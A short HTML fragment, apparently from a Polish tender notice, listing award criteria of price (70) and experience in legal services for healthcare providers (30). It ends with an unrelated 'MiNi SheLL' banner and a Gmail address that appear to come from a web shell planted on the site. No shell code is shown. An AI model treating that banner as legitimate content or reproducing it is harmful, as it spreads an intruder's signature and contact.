<li>1. Cena - 70</li>
<li>2. Doświadczenie  w zakresie obsługi prawnej podmiotów leczniczych - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com